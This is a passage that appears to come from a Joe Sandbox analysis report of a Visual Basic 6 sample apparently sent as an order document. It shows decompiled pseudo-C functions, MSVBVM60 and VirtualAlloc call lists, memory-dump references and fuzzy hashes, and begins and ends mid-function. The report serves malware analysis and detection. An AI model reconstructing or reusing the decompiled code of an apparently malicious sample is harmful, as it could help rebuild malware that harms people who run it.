				intOrPtr* _t70;
				void* _t72;
				void* _t74;
				intOrPtr _t75;

				_t75 = _t74 - 0xc;
				 *[fs:0x0] = _t75;
				_v16 = _t75 - 0x54;
				_v12 = 0x4013b0;
				_v8 = 0;
				_t39 = _a4;
				 *((intOrPtr*)( *_t39 + 4))(_t39, __edi, __esi, __ebx,  *[fs:0x0], 0x4013f6, _t72);
				_t41 =  *0x416010; // 0x4f00d8
				_v32 = 0;
				_v28 = 0;
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v64 = 0;
				if(_t41 == 0) {
					_push(0x416010);
					_push(0x40de54);
					L0040155E();
					_t41 =  *0x416010; // 0x4f00d8
				}
				_push( *((intOrPtr*)( *_t41 + 0x30c))(_t41));
				_t43 =  &_v48;
				_push(_t43);
				L0040154C();
				_t67 = _t43;
				_t44 =  *0x416010; // 0x4f00d8
				_v92 = _t67;
				_v72 = 0x80020004;
				_v80 = 0xa;
				if(_t44 == 0) {
					_push(0x416010);
					_push(0x40de54);
					L0040155E();
					_t44 =  *0x416010; // 0x4f00d8
				}
				_t46 =  &_v40;
				L0040154C();
				_t70 = _t46;
				_t48 =  *((intOrPtr*)( *_t70 + 0x190))(_t70,  &_v44, _t46,  *((intOrPtr*)( *_t44 + 0x340))(_t44));
				asm("fclex");
				if(_t48 < 0) {
					_push(0x190);
					_push(0x40daa8);
					_push(_t70);
					_push(_t48);
					L00401558();
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t49 =  &_v64;
				asm("movsd");
				_v108 =  *_t67;
				L00401522(); // executed
				L004014EC();
				L00401504();
				_t51 =  *((intOrPtr*)(_v108 + 0x1ec))(_v92, _t49, _t49, _t49, _v44, 0, 0);
				asm("fclex");
				if(_t51 < 0) {
					_push(0x1ec);
					_push(0x40dc14);
					_push(_v92);
					_push(_t51);
					L00401558();
				}
				L00401528();
				_push( &_v48);
				_push( &_v44);
				_t54 =  &_v40;
				_push(_t54);
				_push(3);
				L00401546();
				L00401516();
				_v32 = 0x389c1670;
				_v28 = 0x5af9;
				_push(E00414B27);
				return _t54;
			}

0x0041498a
0x00414999
0x004149a6
0x004149a9
0x004149b2
0x004149b5
0x004149bb
0x004149be
0x004149c5
0x004149c8
0x004149cb
0x004149ce
0x004149d1
0x004149d4
0x004149d7
0x004149da
0x004149dc
0x004149e1
0x004149e6
0x004149eb
0x004149eb
0x004149f9
0x004149fa
0x004149fd
0x004149fe
0x00414a03
0x00414a05
0x00414a0c
0x00414a0f
0x00414a16
0x00414a1d
0x00414a1f
0x00414a24
0x00414a29
0x00414a2e
0x00414a2e
0x00414a3d
0x00414a41
0x00414a49
0x00414a4f
0x00414a55
0x00414a59
0x00414a5b
0x00414a60
0x00414a65
0x00414a66
0x00414a67
0x00414a67
0x00414a76
0x00414a77
0x00414a7d
0x00414a7e
0x00414a82
0x00414a83
0x00414a86
0x00414a8f
0x00414a99
0x00414aa5
0x00414aab
0x00414aaf
0x00414ab1
0x00414ab6
0x00414abb
0x00414abe
0x00414abf
0x00414abf
0x00414ac7
0x00414acf
0x00414ad3
0x00414ad4
0x00414ad7
0x00414ad8
0x00414ada
0x00414ae5
0x00414aea
0x00414af1
0x00414af8
0x00000000

APIs

__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 004149E6
__vbaObjSet.MSVBVM60(?,00000000), ref: 004149FE
__vbaNew2.MSVBVM60(0040DE54,00416010,?,00000000), ref: 00414A29
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414A41
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DAA8,00000190), ref: 00414A67
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00414A86
__vbaStrVarMove.MSVBVM60(00000000), ref: 00414A8F
__vbaStrMove.MSVBVM60(00000000), ref: 00414A99
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DC14,000001EC), ref: 00414ABF
__vbaFreeStr.MSVBVM60 ref: 00414AC7
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00414ADA
__vbaFreeVar.MSVBVM60 ref: 00414AE5

Memory Dump Source

Source File: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckHresultMoveNew2$CallLateList
String ID:
API String ID: 3081447974-0
Opcode ID: f4332d8e0ab93a4531de8d70540e45a52df5129872e44f7a009223ed55894db3
Instruction ID: ccde0520d1b79f1b6add1dccc3f26d05d9b69b646b608a477e6d899c2c28c292
Opcode Fuzzy Hash: f4332d8e0ab93a4531de8d70540e45a52df5129872e44f7a009223ed55894db3
Instruction Fuzzy Hash: 2741ECB1D00204ABCB01EFD9C885ADEBBB8BF48304F50442AF516BB291DB7999458B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040157C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401581

Strings

VB5!6&*, xrefs: 0040157C

Memory Dump Source

Source File: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: e345a690007a34138f96a7ce14a60ae483a67cf9896732e1ca45a97719e44a23
Instruction ID: 5663ca34d4e9a77a529cff9aed93ea72537c89c5caf4b87509c06c17e468bb16
Opcode Fuzzy Hash: e345a690007a34138f96a7ce14a60ae483a67cf9896732e1ca45a97719e44a23
Instruction Fuzzy Hash: 23D04E0094E3C01EE70323724D211042FB49C93A5030F06EB91C2CE0F3C08C4889C77B

Uniqueness

Uniqueness Score: -1.00%

Function 00404C02, Relevance: 1.7, APIs: 1, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89234d04b631d0bcbc04722f219f4c082423e40d69000eeefb0f7f59c4bb2eb0
Instruction ID: 3b9a9504f9f16e843b0417f4907195c5775bac2623f6d1492e37d6976387c8c9
Opcode Fuzzy Hash: 89234d04b631d0bcbc04722f219f4c082423e40d69000eeefb0f7f59c4bb2eb0
Instruction Fuzzy Hash: 9E714722B1AB000B8759D4BE88D0AA7D1C39FDE250739E639212DE73A9FD79CD4B0548

Uniqueness

Uniqueness Score: -1.00%

Function 00404B1C, Relevance: 1.7, APIs: 1, Instructions: 430COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 269d88b92d31d7c64cff7cacf4d3aa9d15d6b0bb69987b915ea1243f87643037
Instruction ID: 00a45efc0d6110a11f7414d43acb4d9f5365361cdbf996614e9a76da2357be46
Opcode Fuzzy Hash: 269d88b92d31d7c64cff7cacf4d3aa9d15d6b0bb69987b915ea1243f87643037
Instruction Fuzzy Hash: 8F813962B1AB000B8759D4BE89D0AA7D1D39FDE250739E63D212DF33A9FD79CC4A1148

Uniqueness

Uniqueness Score: -1.00%

Function 00404CF5, Relevance: 1.6, APIs: 1, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96f7e8c15b614d6644386cc4ffa30760f0bb894d7e5f3615cf0a2c56bf0c7ca9
Instruction ID: 30de3a81ea9bf2f7c0583e9b155e4401e809e1b6c0d05764b74a238707aa39ac
Opcode Fuzzy Hash: 96f7e8c15b614d6644386cc4ffa30760f0bb894d7e5f3615cf0a2c56bf0c7ca9
Instruction Fuzzy Hash: 2A612762B1AB000B8759D4BE89D0A6791C3DFDE250739E639212DF33A9FD79CC4B0548

Uniqueness

Uniqueness Score: -1.00%

Function 00404EE6, Relevance: 1.5, APIs: 1, Instructions: 278memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cd11b77944458edd8cb50921c36496eb7c8fc6171ace961bcbcb0cc10f73f52a
Instruction ID: 40d140d61c1a91f208ad801570af81a6a8f36a5993d6d350075b070321140268
Opcode Fuzzy Hash: cd11b77944458edd8cb50921c36496eb7c8fc6171ace961bcbcb0cc10f73f52a
Instruction Fuzzy Hash: BE516526F19B040B875AD8BE889069791D39FDE250739E639202DE3369FD79CC4B0688

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF2, Relevance: 1.5, APIs: 1, Instructions: 275memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3e97dc4dedb58a5ae15a82f778aabc84891f086691f87323e07e13a0d5360f1e
Instruction ID: d0a76fcca5b50f1329e17c57fc654c5d253edf6a160e0dfc7982a7070154e307
Opcode Fuzzy Hash: 3e97dc4dedb58a5ae15a82f778aabc84891f086691f87323e07e13a0d5360f1e
Instruction Fuzzy Hash: 9E514A22F1AB000B8759D47E8890A5791D3DFDE260739E639602DF33A9FD79CC4B1548

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004143A6, Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E004143A6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				intOrPtr _v52;
				char _v60;
				signed int _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t43;
				intOrPtr* _t75;
				intOrPtr* _t76;
				intOrPtr* _t77;
				signed int _t80;
				intOrPtr _t83;
				intOrPtr _t86;

				_push(0x4013f6);
				_t38 =  *[fs:0x0];
				_push(_t38);
				 *[fs:0x0] = _t80;
				_v12 = _t80 - 0x54;
				_v8 = 0x401368;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v60 = 0;
				L004014AA();
				L004014AA();
				L0040149E();
				L00401504();
				_push(_t38);
				_push(L"DICE");
				L004014A4();
				asm("sbb esi, esi");
				L00401528();
				if( ~( ~_t38 + 1) != 0) {
					_push( &_v60);
					_v52 = 0x80020004;
					_v60 = 0xa;
					L00401498();
					L00401516();
					_t83 =  *0x416364; // 0x2bfe8d4
					if(_t83 == 0) {
						_push(0x416364);
						_push(0x40da30);
						L0040155E();
					}
					_t75 =  *0x416364; // 0x2bfe8d4
					_t41 =  *((intOrPtr*)( *_t75 + 0x14))(_t75,  &_v44);
					asm("fclex");
					if(_t41 < 0) {
						_push(0x14);
						_push(0x40da20);
						_push(_t75);
						_push(_t41);
						L00401558();
					}
					_t42 = _v44;
					_t76 = _t42;
					_t43 =  *((intOrPtr*)( *_t42 + 0xf0))(_t42,  &_v40);
					asm("fclex");
					if(_t43 < 0) {
						_push(0xf0);
						_push(0x40da40);
						_push(_t76);
						_push(_t43);
						L00401558();
					}
					_v40 = 0;
					L00401504();
					L00401552();
					_t86 =  *0x416364; // 0x2bfe8d4
					if(_t86 == 0) {
						_push(0x416364);
						_push(0x40da30);
						L0040155E();
					}
					_t77 =  *0x416364; // 0x2bfe8d4
					_t38 =  *((intOrPtr*)( *_t77 + 0x48))(_t77, 0x80,  &_v40);
					asm("fclex");
					if(_t38 < 0) {
						_push(0x48);
						_push(0x40da20);
						_push(_t77);
						_push(_t38);
						L00401558();
					}
					_v40 = 0;
					L00401504();
				}
				_push(E00414557);
				L00401528();
				L00401528();
				L00401528();
				L00401528();
				return _t38;
			}

0x004143ab
0x004143b0
0x004143b6
0x004143b7
0x004143c4
0x004143c7
0x004143d6
0x004143d9
0x004143dc
0x004143df
0x004143e2
0x004143e5
0x004143e8
0x004143eb
0x004143f6
0x004143fb
0x00414405
0x0041440a
0x0041440b
0x00414410
0x00414419
0x00414421
0x00414429
0x00414432
0x00414433
0x0041443a
0x00414441
0x00414449
0x0041444e
0x00414454
0x00414456
0x0041445b
0x00414460
0x00414460
0x00414465
0x00414472
0x00414475
0x00414479
0x0041447b
0x0041447d
0x00414482
0x00414483
0x00414484
0x00414484
0x00414489
0x00414493
0x00414495
0x0041449b
0x0041449f
0x004144a1
0x004144a6
0x004144ab
0x004144ac
0x004144ad
0x004144ad
0x004144b8
0x004144bb
0x004144c3
0x004144c8
0x004144ce
0x004144d0
0x004144d5
0x004144da
0x004144da
0x004144df
0x004144f1
0x004144f4
0x004144f8
0x004144fa
0x004144fc
0x00414501
0x00414502
0x00414503
0x00414503
0x0041450e
0x00414511
0x00414511
0x00414516
0x00414539
0x00414541
0x00414549
0x00414551
0x00414556

APIs

__vbaStrCopy.MSVBVM60 ref: 004143EB
__vbaStrCopy.MSVBVM60 ref: 004143F6
#669.MSVBVM60 ref: 004143FB
__vbaStrMove.MSVBVM60 ref: 00414405
__vbaStrCmp.MSVBVM60(DICE,00000000), ref: 00414410
__vbaFreeStr.MSVBVM60(DICE,00000000), ref: 00414421
#594.MSVBVM60(?,DICE,00000000), ref: 00414441
__vbaFreeVar.MSVBVM60(?,DICE,00000000), ref: 00414449
__vbaNew2.MSVBVM60(0040DA30,00416364,?,DICE,00000000), ref: 00414460
__vbaHresultCheckObj.MSVBVM60(00000000,02BFE8D4,0040DA20,00000014), ref: 00414484
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA40,000000F0), ref: 004144AD
__vbaStrMove.MSVBVM60(00000000,?,0040DA40,000000F0), ref: 004144BB
__vbaFreeObj.MSVBVM60(00000000,?,0040DA40,000000F0), ref: 004144C3
__vbaNew2.MSVBVM60(0040DA30,00416364), ref: 004144DA
__vbaHresultCheckObj.MSVBVM60(00000000,02BFE8D4,0040DA20,00000048), ref: 00414503
__vbaStrMove.MSVBVM60(00000000,02BFE8D4,0040DA20,00000048), ref: 00414511
__vbaFreeStr.MSVBVM60(00414557,DICE,00000000), ref: 00414539
__vbaFreeStr.MSVBVM60(00414557,DICE,00000000), ref: 00414541
__vbaFreeStr.MSVBVM60(00414557,DICE,00000000), ref: 00414549
__vbaFreeStr.MSVBVM60(00414557,DICE,00000000), ref: 00414551

Strings

DICE, xrefs: 0041440B

Memory Dump Source

Source File: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckHresultMove$CopyNew2$#594#669
String ID: DICE
API String ID: 3067780711-2543521760
Opcode ID: 3c97a2a022ad3300607320decd5a5cf7e9f3f41c9828c5d9d3ccb88febd51c45
Instruction ID: d23d128d7b24eae07e39dcb3c7f0d2caced7c04bc43e14603b701ac5ece39557
Opcode Fuzzy Hash: 3c97a2a022ad3300607320decd5a5cf7e9f3f41c9828c5d9d3ccb88febd51c45
Instruction Fuzzy Hash: 77416C70D40209ABCB10EF96CC46AEEB7B4EF94714F20402EF512771A1DB786A45CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00414C40, Relevance: 25.6, APIs: 17, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00414C40(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v52;
				char _v60;
				intOrPtr* _t39;
				char* _t40;
				void* _t42;
				intOrPtr* _t43;
				void* _t44;
				intOrPtr* _t46;
				intOrPtr* _t48;
				void* _t50;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr* _t74;
				void* _t75;
				void* _t77;
				intOrPtr _t78;
				intOrPtr _t81;

				_t78 = _t77 - 0xc;
				 *[fs:0x0] = _t78;
				_v16 = _t78 - 0x54;
				_v12 = 0x4013d0;
				_v8 = 0;
				_t39 = _a4;
				_t40 =  *((intOrPtr*)( *_t39 + 4))(_t39, __edi, __esi, __ebx,  *[fs:0x0], 0x4013f6, _t75);
				_push(0x40dccc);
				_v28 = 0;
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v60 = 0;
				L00401492();
				if(_t40 != 1) {
					_t81 =  *0x416364; // 0x2bfe8d4
					if(_t81 == 0) {
						_push(0x416364);
						_push(0x40da30);
						L0040155E();
					}
					_t72 =  *0x416364; // 0x2bfe8d4
					_t42 =  *((intOrPtr*)( *_t72 + 0x14))(_t72,  &_v44);
					asm("fclex");
					if(_t42 < 0) {
						_push(0x14);
						_push(0x40da20);
						_push(_t72);
						_push(_t42);
						L00401558();
					}
					_t43 = _v44;
					_t73 = _t43;
					_t44 =  *((intOrPtr*)( *_t43 + 0xf8))(_t43,  &_v40);
					asm("fclex");
					if(_t44 < 0) {
						_push(0xf8);
						_push(0x40da40);
						_push(_t73);
						_push(_t44);
						L00401558();
					}
					_v40 = 0;
					L00401504();
					L00401552();
					_push( &_v60);
					_v52 = 0x80020004;
					_v60 = 0xa;
					L0040148C();
					L00401516();
					_t46 =  *0x416010; // 0x4f00d8
					if(_t46 == 0) {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						_t46 =  *0x416010; // 0x4f00d8
					}
					_t48 =  &_v44;
					L0040154C();
					_t74 = _t48;
					_t50 =  *((intOrPtr*)( *_t74 + 0x48))(_t74,  &_v40, _t48,  *((intOrPtr*)( *_t46 + 0x304))(_t46));
					asm("fclex");
					if(_t50 < 0) {
						_push(0x48);
						_push(0x40da68);
						_push(_t74);
						_push(_t50);
						L00401558();
					}
					_v52 = _v40;
					_t40 =  &_v60;
					_push(_t40);
					_v40 = 0;
					_v60 = 8;
					L00401486();
					L00401504();
					L00401552();
					L00401516();
				}
				_push(E00414DE6);
				L00401528();
				L00401528();
				return _t40;
			}

0x00414c43
0x00414c52
0x00414c5f
0x00414c62
0x00414c6b
0x00414c6e
0x00414c74
0x00414c77
0x00414c7c
0x00414c7f
0x00414c82
0x00414c85
0x00414c88
0x00414c8b
0x00414c93
0x00414c99
0x00414c9f
0x00414ca1
0x00414ca6
0x00414cab
0x00414cab
0x00414cb0
0x00414cbd
0x00414cc0
0x00414cc4
0x00414cc6
0x00414cc8
0x00414ccd
0x00414cce
0x00414ccf
0x00414ccf
0x00414cd4
0x00414cde
0x00414ce0
0x00414ce6
0x00414cea
0x00414cec
0x00414cf1
0x00414cf6
0x00414cf7
0x00414cf8
0x00414cf8
0x00414d03
0x00414d06
0x00414d0e
0x00414d16
0x00414d17
0x00414d1e
0x00414d25
0x00414d2d
0x00414d32
0x00414d39
0x00414d3b
0x00414d40
0x00414d45
0x00414d4a
0x00414d4a
0x00414d59
0x00414d5d
0x00414d65
0x00414d6b
0x00414d6e
0x00414d72
0x00414d74
0x00414d76
0x00414d7b
0x00414d7c
0x00414d7d
0x00414d7d
0x00414d85
0x00414d88
0x00414d8b
0x00414d8c
0x00414d8f
0x00414d96
0x00414da0
0x00414da8
0x00414db0
0x00414db0
0x00414db5
0x00414dd8
0x00414de0
0x00414de5

APIs

__vbaLenBstr.MSVBVM60(0040DCCC), ref: 00414C8B
__vbaNew2.MSVBVM60(0040DA30,00416364,0040DCCC), ref: 00414CAB
__vbaHresultCheckObj.MSVBVM60(00000000,02BFE8D4,0040DA20,00000014), ref: 00414CCF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA40,000000F8), ref: 00414CF8
__vbaStrMove.MSVBVM60(00000000,?,0040DA40,000000F8), ref: 00414D06
__vbaFreeObj.MSVBVM60(00000000,?,0040DA40,000000F8), ref: 00414D0E
#648.MSVBVM60(?), ref: 00414D25
__vbaFreeVar.MSVBVM60(?), ref: 00414D2D
__vbaNew2.MSVBVM60(0040DE54,00416010,?), ref: 00414D45
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414D5D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DA68,00000048), ref: 00414D7D
#667.MSVBVM60(0000000A), ref: 00414D96
__vbaStrMove.MSVBVM60(0000000A), ref: 00414DA0
__vbaFreeObj.MSVBVM60(0000000A), ref: 00414DA8
__vbaFreeVar.MSVBVM60(0000000A), ref: 00414DB0
__vbaFreeStr.MSVBVM60(00414DE6,0040DCCC), ref: 00414DD8
__vbaFreeStr.MSVBVM60(00414DE6,0040DCCC), ref: 00414DE0

Memory Dump Source

Source File: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$#648#667Bstr
String ID:
API String ID: 1293598690-0
Opcode ID: a9c75e8508d2d699cd0675b886f5c3d5055cb9cfbd0eb965f66d36e535c347cd
Instruction ID: 872b19b41c9c175017c7fdac7b394595c20a8ce49ddcb627966ff441fb7a56ba
Opcode Fuzzy Hash: a9c75e8508d2d699cd0675b886f5c3d5055cb9cfbd0eb965f66d36e535c347cd
Instruction Fuzzy Hash: DA414070940208ABCB10EF95CC85EDEBBB8EF98304F10442BF506B72A1DB789945CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00414E03, Relevance: 24.2, APIs: 16, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00414E03(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a32) {
				int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void _v304;
				int _v308;
				char _v312;
				void* _v316;
				char _v320;
				void _v476;
				intOrPtr* _t40;
				void* _t47;
				char* _t48;
				signed int _t53;
				void* _t55;
				intOrPtr* _t56;
				void* _t57;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;
				signed int _t66;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr* _t95;
				void* _t96;
				void* _t98;
				intOrPtr _t99;
				intOrPtr _t105;
				intOrPtr _t108;

				_t99 = _t98 - 0xc;
				 *[fs:0x0] = _t99;
				_v16 = _t99 - 0x1cc;
				_v12 = 0x4013e0;
				_v8 = 0;
				_t40 = _a4;
				 *((intOrPtr*)( *_t40 + 4))(_t40, __edi, __esi, __ebx,  *[fs:0x0], 0x4013f6, _t96);
				_t66 = 0x43;
				memset( &_v304, 0, _t66 << 2);
				asm("stosw");
				_push(0x22);
				memset( &_v476, 0, 0 << 2);
				_v308 = 0;
				_v312 = 0;
				_v316 = 0;
				_v320 = 0;
				L004014AA();
				_push(0);
				_push( &_v304);
				_t47 =  &_v476;
				_push(_t47);
				_push(0x40d540);
				L00401540();
				_push(_t47);
				_push(0x40da64);
				_t48 =  &_v312;
				_push(_t48);
				L0040153A();
				_push(_t48);
				E0040D634();
				L00401534();
				_push( &_v476);
				_push( &_v304);
				_push(0x40d540);
				L0040152E();
				_t53 =  ~(0 | _t48 == 0x001d821d);
				L00401528();
				if(_t53 != 0) {
					_t105 =  *0x416364; // 0x2bfe8d4
					if(_t105 == 0) {
						_push(0x416364);
						_push(0x40da30);
						L0040155E();
					}
					_t91 =  *0x416364; // 0x2bfe8d4
					_t55 =  *((intOrPtr*)( *_t91 + 0x14))(_t91,  &_v316);
					asm("fclex");
					if(_t55 < 0) {
						_push(0x14);
						_push(0x40da20);
						_push(_t91);
						_push(_t55);
						L00401558();
					}
					_t56 = _v316;
					_t92 = _t56;
					_t57 =  *((intOrPtr*)( *_t56 + 0xb8))(_t56,  &_v320);
					asm("fclex");
					if(_t57 < 0) {
						_push(0xb8);
						_push(0x40da40);
						_push(_t92);
						_push(_t57);
						L00401558();
					}
					L00401552();
					_t108 =  *0x416364; // 0x2bfe8d4
					if(_t108 == 0) {
						_push(0x416364);
						_push(0x40da30);
						L0040155E();
					}
					_t93 =  *0x416364; // 0x2bfe8d4
					_t59 =  *((intOrPtr*)( *_t93 + 0x14))(_t93,  &_v316);
					asm("fclex");
					if(_t59 < 0) {
						_push(0x14);
						_push(0x40da20);
						_push(_t93);
						_push(_t59);
						L00401558();
					}
					_t60 = _v316;
					_t94 = _t60;
					_t61 =  *((intOrPtr*)( *_t60 + 0x140))(_t60,  &_v320);
					asm("fclex");
					if(_t61 < 0) {
						_push(0x140);
						_push(0x40da40);
						_push(_t94);
						_push(_t61);
						L00401558();
					}
					L00401552();
					_t95 = _a4;
					_t53 =  *((intOrPtr*)( *_t95 + 0x15c))(_t95, 0x4acd);
					asm("fclex");
					if(_t53 < 0) {
						_push(0x15c);
						_push(0x40d230);
						_push(_t95);
						_push(_t53);
						L00401558();
					}
				}
				_push(E00415032);
				L00401528();
				return _t53;
			}

0x00414e06
0x00414e15
0x00414e25
0x00414e28
0x00414e31
